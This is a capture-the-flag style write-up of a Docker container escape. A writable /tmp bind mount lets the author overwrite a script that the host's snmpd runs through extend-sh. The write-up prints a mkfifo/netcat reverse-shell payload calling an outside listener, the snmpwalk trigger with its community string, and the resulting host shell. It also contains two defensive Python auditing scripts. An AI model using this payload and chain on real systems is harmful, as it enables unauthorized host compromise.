debian-snmp


During an assessment of the Docker host, carried out from inside the container a7c367c2113d, the SNMP configuration file (/var/backups/.snmpd.conf) revealed that snmpd executes a custom Bash script (/tmp/shtest) through the net-snmp extend-sh directive. Execution of this script was later confirmed. The configuration also included a read-only community string, which exposed extensive information about the host system.

Additionally, the CDK tool detected that the container's /tmp directory is bind-mounted directly from the Docker host's /tmp directory. This is a security risk: an attacker inside the container can create or modify /tmp/shtest, and because the SNMP daemon on the host executes that script, the mount can be leveraged to achieve code execution on the host, a significant vulnerability.

www-data@a7c367c2113d:/var/tmp$ cat /proc/self/mountinfo | grep -w /tmp
445 425 8:1 /tmp /tmp rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro,data=ordered

This can be checked manually by reading /proc/self/mountinfo: the entry above shows the container's /tmp served directly from the host's block device /dev/sda1 (ext4), not from the container's own filesystem.
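A detection check for the mount misconfiguration described above, written here as an added example (it is not part of the original assessment notes or of CDK): it parses /proc/self/mountinfo and reports writable mounts that are backed by a host block device, the trace a -v /tmp:/tmp style bind mount leaves behind. The sample input contains the page's own /tmp entry plus constructed overlay, /proc and /etc/hosts lines; CONTAINERID is a placeholder, and the function and class names are my own.

```python
"""Report mounts inside a container that are backed by a host block device.

Added example for detecting the bind-mount exposure described above; it is
not part of the original assessment notes. It parses the /proc/self/mountinfo
format (fields before ' - ': id, parent, major:minor, root, mount point,
options, optional tags; after it: fstype, source, super options).
"""
from dataclasses import dataclass

# Constructed sample: the /tmp line is the one captured on the page, the other
# three lines are what a typical Docker container shows (overlay root, /proc,
# and the /etc/hosts file Docker itself bind-mounts). CONTAINERID is a placeholder.
SAMPLE_MOUNTINFO = """\
425 390 0:58 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/LOWER,upperdir=/var/lib/docker/overlay2/UPPER/diff,workdir=/var/lib/docker/overlay2/UPPER/work
426 425 0:59 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
445 425 8:1 /tmp /tmp rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro,data=ordered
446 425 8:1 /var/lib/docker/containers/CONTAINERID/hosts /etc/hosts rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro,data=ordered
"""

ON_DISK_FSTYPES = {"ext4", "ext3", "xfs", "btrfs"}
# Files Docker bind-mounts from its own state directory are host-backed too,
# but expected; exclude them so the report shows only operator-added mounts.
DOCKER_MANAGED_PREFIX = "/var/lib/docker/containers/"


@dataclass
class Mount:
    mount_id: int
    parent_id: int
    root: str         # path on the source filesystem that was mounted
    mount_point: str  # where it appears in this mount namespace
    options: str      # per-mount options, the first one is rw or ro
    fstype: str
    source: str


def parse_mountinfo(text):
    """Parse mountinfo text into Mount records (malformed lines are skipped)."""
    mounts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        left, sep, right = line.partition(" - ")
        if not sep:
            continue
        lf, rf = left.split(), right.split()
        mounts.append(Mount(int(lf[0]), int(lf[1]), lf[3], lf[4], lf[5], rf[0], rf[1]))
    return mounts


def is_writable(mount):
    return mount.options.split(",")[0] == "rw"


def host_backed_bind_mounts(mounts):
    """Mounts served straight from a /dev block device on an on-disk filesystem.

    With an overlay root, such a mount can only come from outside the image,
    i.e. a host-path bind mount; anything written there lands on the host.
    """
    return [m for m in mounts
            if m.source.startswith("/dev/")
            and m.fstype in ON_DISK_FSTYPES
            and not m.root.startswith(DOCKER_MANAGED_PREFIX)]


def report(text):
    """One human-readable finding per host-backed mount."""
    lines = []
    for m in host_backed_bind_mounts(parse_mountinfo(text)):
        mode = "writable" if is_writable(m) else "read-only"
        lines.append(f"{m.mount_point}: host path {m.root} on {m.source} ({m.fstype}), {mode}")
    return lines


if __name__ == "__main__":
    # On a live container, pass open("/proc/self/mountinfo").read() instead.
    for finding in report(SAMPLE_MOUNTINFO):
        print(finding)
```

On the sample this reports only /tmp; the Docker-managed /etc/hosts line is host-backed as well but filtered out as expected. A container whose root filesystem sits on a block-device storage driver will also appear with mount point /, which a reviewer should treat as the baseline rather than a finding.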

www-data@a7c367c2113d:/var/tmp$ echo -n 'mkfifo /tmp/tlfglg; nc 192.168.45.153 6666 0</tmp/tlfglg | /bin/sh >/tmp/tlfglg 2>&1; rm /tmp/tlfglg' > /tmp/shtest

Creating the /tmp/shtest file with the reverse shell payload

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/escape_offsec]
└─$ snmpwalk -v 1 -c 53cur3M0NiT0riNg $IP iso.3.6.1.4.1.8072.1.3.2
iso.3.6.1.4.1.8072.1.3.2.1.0 = INTEGER: 3
iso.3.6.1.4.1.8072.1.3.2.2.1.2.5.116.101.115.116.49 = STRING: "/bin/echo"
iso.3.6.1.4.1.8072.1.3.2.2.1.2.5.116.101.115.116.50 = STRING: "echo"
iso.3.6.1.4.1.8072.1.3.2.2.1.2.5.116.101.115.116.51 = STRING: "/bin/sh"
iso.3.6.1.4.1.8072.1.3.2.2.1.3.5.116.101.115.116.49 = STRING: "Hello, world!"
iso.3.6.1.4.1.8072.1.3.2.2.1.3.5.116.101.115.116.50 = STRING: "Hello, world! ; echo Hi there ; exit 35"
iso.3.6.1.4.1.8072.1.3.2.2.1.3.5.116.101.115.116.51 = STRING: "/tmp/shtest"
iso.3.6.1.4.1.8072.1.3.2.2.1.4.5.116.101.115.116.49 = ""
iso.3.6.1.4.1.8072.1.3.2.2.1.4.5.116.101.115.116.50 = ""
iso.3.6.1.4.1.8072.1.3.2.2.1.4.5.116.101.115.116.51 = ""
iso.3.6.1.4.1.8072.1.3.2.2.1.5.5.116.101.115.116.49 = INTEGER: 5
iso.3.6.1.4.1.8072.1.3.2.2.1.5.5.116.101.115.116.50 = INTEGER: 5
iso.3.6.1.4.1.8072.1.3.2.2.1.5.5.116.101.115.116.51 = INTEGER: 5
iso.3.6.1.4.1.8072.1.3.2.2.1.6.5.116.101.115.116.49 = INTEGER: 1
iso.3.6.1.4.1.8072.1.3.2.2.1.6.5.116.101.115.116.50 = INTEGER: 2
iso.3.6.1.4.1.8072.1.3.2.2.1.6.5.116.101.115.116.51 = INTEGER: 2
iso.3.6.1.4.1.8072.1.3.2.2.1.7.5.116.101.115.116.49 = INTEGER: 1
iso.3.6.1.4.1.8072.1.3.2.2.1.7.5.116.101.115.116.50 = INTEGER: 1
iso.3.6.1.4.1.8072.1.3.2.2.1.7.5.116.101.115.116.51 = INTEGER: 1
iso.3.6.1.4.1.8072.1.3.2.2.1.20.5.116.101.115.116.49 = INTEGER: 4
iso.3.6.1.4.1.8072.1.3.2.2.1.20.5.116.101.115.116.50 = INTEGER: 4
iso.3.6.1.4.1.8072.1.3.2.2.1.20.5.116.101.115.116.51 = INTEGER: 4
iso.3.6.1.4.1.8072.1.3.2.2.1.21.5.116.101.115.116.49 = INTEGER: 1
iso.3.6.1.4.1.8072.1.3.2.2.1.21.5.116.101.115.116.50 = INTEGER: 1
iso.3.6.1.4.1.8072.1.3.2.2.1.21.5.116.101.115.116.51 = INTEGER: 1
iso.3.6.1.4.1.8072.1.3.2.3.1.1.5.116.101.115.116.49 = STRING: "Hello, world!"
iso.3.6.1.4.1.8072.1.3.2.3.1.1.5.116.101.115.116.50 = STRING: "Hello, world!"

Invoking the payload by sending an SNMP query: walking the extend objects makes snmpd run /tmp/shtest on the host.
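To audit what an snmpd instance exposes through its extend entries, the following added example (my own code, not the author's tooling) parses snmpwalk output like the walk above: it decodes the token name that is encoded in the OID index (5.116.101.115.116.49 is length-prefixed ASCII for test1), maps the column numbers to their NET-SNMP-EXTEND-MIB meaning, and flags entries that run through a shell or reference a world-writable directory. The sample input is a subset of the walk shown on the page; the function, dictionary and constant names are assumptions of mine.

```python
"""Parse a NET-SNMP-EXTEND-MIB walk into an inventory of extend entries.

Added example for auditing snmpd 'extend' / 'extend-sh' configuration from
the agent's own view; it is not part of the original assessment notes.
Column numbers follow NET-SNMP-EXTEND-MIB: nsExtendConfigTable is .2 and
nsExtendOutput1Table is .3 under nsExtendObjects (1.3.6.1.4.1.8072.1.3.2).
"""
import re

EXTEND_BASE = "iso.3.6.1.4.1.8072.1.3.2"   # nsExtendObjects as snmpwalk prints it without MIBs
CONFIG_COLUMNS = {                          # nsExtendConfigEntry columns
    2: "command", 3: "args", 4: "input", 5: "cache_time",
    6: "exec_type", 7: "run_type", 20: "storage", 21: "status",
}
OUTPUT1_COLUMNS = {                         # nsExtendOutput1Entry columns
    1: "output_first_line", 2: "output_full", 3: "num_lines", 4: "result",
}
EXEC_TYPES = {1: "exec", 2: "shell"}        # nsExtendExecType values
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Subset of the walk captured on the page (tokens test1, test2, test3).
SAMPLE_WALK = """\
iso.3.6.1.4.1.8072.1.3.2.1.0 = INTEGER: 3
iso.3.6.1.4.1.8072.1.3.2.2.1.2.5.116.101.115.116.49 = STRING: "/bin/echo"
iso.3.6.1.4.1.8072.1.3.2.2.1.2.5.116.101.115.116.50 = STRING: "echo"
iso.3.6.1.4.1.8072.1.3.2.2.1.2.5.116.101.115.116.51 = STRING: "/bin/sh"
iso.3.6.1.4.1.8072.1.3.2.2.1.3.5.116.101.115.116.49 = STRING: "Hello, world!"
iso.3.6.1.4.1.8072.1.3.2.2.1.3.5.116.101.115.116.50 = STRING: "Hello, world! ; echo Hi there ; exit 35"
iso.3.6.1.4.1.8072.1.3.2.2.1.3.5.116.101.115.116.51 = STRING: "/tmp/shtest"
iso.3.6.1.4.1.8072.1.3.2.2.1.4.5.116.101.115.116.49 = ""
iso.3.6.1.4.1.8072.1.3.2.2.1.6.5.116.101.115.116.49 = INTEGER: 1
iso.3.6.1.4.1.8072.1.3.2.2.1.6.5.116.101.115.116.50 = INTEGER: 2
iso.3.6.1.4.1.8072.1.3.2.2.1.6.5.116.101.115.116.51 = INTEGER: 2
iso.3.6.1.4.1.8072.1.3.2.3.1.1.5.116.101.115.116.49 = STRING: "Hello, world!"
iso.3.6.1.4.1.8072.1.3.2.3.1.1.5.116.101.115.116.50 = STRING: "Hello, world!"
"""

LINE_RE = re.compile(r'^(?P<oid>\S+) = (?:(?P<type>[A-Za-z0-9-]+): )?(?P<value>.*)$')


def decode_token(index):
    """OID index of an extend entry is <length>.<ascii code>... ; return the token."""
    length = index[0]
    if length != len(index) - 1:
        raise ValueError("index length byte does not match OID suffix")
    return bytes(index[1:]).decode("ascii")


def parse_value(typ, raw):
    if typ == "INTEGER":
        return int(raw)
    return raw.strip('"')       # STRING values (and empty ones) are quoted by snmpwalk


def parse_extend_walk(text):
    """Return {token: {column_name: value, ...}} for every extend entry seen."""
    entries = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m or not m.group("oid").startswith(EXTEND_BASE + "."):
            continue
        suffix = [int(p) for p in m.group("oid")[len(EXTEND_BASE) + 1:].split(".")]
        if suffix[0] == 1:      # nsExtendNumEntries scalar carries no token
            continue
        table, column, index = suffix[0], suffix[2], suffix[3:]
        token = decode_token(index)
        value = parse_value(m.group("type"), m.group("value"))
        entry = entries.setdefault(token, {"token": token})
        if table == 2 and column in CONFIG_COLUMNS:
            entry[CONFIG_COLUMNS[column]] = value
        elif table == 3 and column in OUTPUT1_COLUMNS:
            entry[OUTPUT1_COLUMNS[column]] = value
    return entries


def risky_entries(entries):
    """Return {token: [reasons]} for entries a reviewer should look at."""
    findings = {}
    for e in entries.values():
        reasons = []
        if EXEC_TYPES.get(e.get("exec_type")) == "shell":
            reasons.append("runs through a shell (extend-sh), so arguments are parsed by sh")
        words = (e.get("command", "") + " " + e.get("args", "")).split()
        if any(w.startswith(d) for w in words for d in WRITABLE_DIRS):
            reasons.append("command or arguments live under a world-writable directory")
        if reasons:
            findings[e["token"]] = reasons
    return findings


if __name__ == "__main__":
    for token, reasons in risky_entries(parse_extend_walk(SAMPLE_WALK)).items():
        print(token, "->", "; ".join(reasons))
```

On the page's walk this reports test2 (shell execution) and test3 (shell execution of a script under /tmp), while test1, a plain exec of /bin/echo, is clean. The shell-parsing reason is what makes the "; echo Hi there ; exit 35" arguments of test2 meaningful, and the world-writable-path reason is exactly the condition that the /tmp bind mount turned into host code execution.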

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/escape_offsec]
└─$ nnc 6666
listening on [any] 6666 ...
connect to [192.168.45.153] from (UNKNOWN) [192.168.122.113] 53096
whoami
Debian-snmp
hostname
escape
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:7e:d3:9c:0e brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:7eff:fed3:9c0e/64 scope link 
       valid_lft forever preferred_lft forever
5: vethe544e37@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 92:34:d7:75:cf:89 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::9034:d7ff:fe75:cf89/64 scope link 
       valid_lft forever preferred_lft forever
6: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:9e:06:af brd ff:ff:ff:ff:ff:ff
    inet 192.168.122.113/24 brd 192.168.122.255 scope global ens192
       valid_lft forever preferred_lft forever

Lateral movement to the escape host as the Debian-snmp account, achieved by exploiting the mount misconfiguration.